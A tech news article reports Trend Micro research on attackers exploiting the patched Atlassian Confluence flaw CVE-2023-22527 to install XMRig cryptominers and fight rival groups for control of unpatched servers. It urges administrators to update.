Major Atlassian flaw hacks systems for crypto mining

Multiple groups are competing for control over vulnerable endpoints

When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.

Atlassian Confluence Data Center and Confluence Server used to carry a maximum severity vulnerability that allowed threat actors to remotely run any malicious code.

Despite the fix being available for months now, there are manyunprotected endpointsout there.

As a result, hackers have been observed installing cryptocurrency miners on these devices, raking up huge electricity bills to the victims, as well as rendering their devices practically unusable.

Fighting for control

This is according to a new report from cybersecurity researchers Trend Micro. Published earlier this week, the report argues that crooks are competing with one another, deleting and installing cryptominers regularly.

The vulnerability is tracked asCVE-2023-22527. It is a critical, 10/10 severity flaw that allows for remote code execution, and that was patched in mid-January this year. However, since mid-June this year, crooks started scanning for vulnerable instances, dropping the XMRig miner where possible. XMRig is the most popular cryptominer out there, generating the Monero (XMR) cryptocurrency. Monero is described as a privacy coin, as it is virtually untraceable.

“The attacks involve threat actors that employ methods such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes, and maintaining persistence via cron jobs,” Trend Micro researcher Abdelrahman Esmail said.

The part about “killing competing crypto mining processes” is particularly interesting. The researcher said that there are at least three different actors struggling to maintain control over these endpoints. Once they compromise the device, they will use a shell script to terminate previous miners, delete all existing cron jobs, uninstallcloud security tools, and gather system information. After that, they will set up a channel with the C2 server, and launch a new miner.

Are you a pro? Subscribe to our newsletter

Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!

“With its continuous exploitation by threat actors, CVE-2023-22527 presents a significant security risk to organizations worldwide,” the researcher added. “To minimize the risks and threats associated with this vulnerability, administrators should update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible.”

ViaThe Hacker News

More from TechRadar Pro

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

This new malware utilizes a rare programming language to evade traditional detection methods

A new form of macOS malware is being used by devious North Korean hackers

I fell in love with the cute and compact Hyundai Inster, but it has one major drawback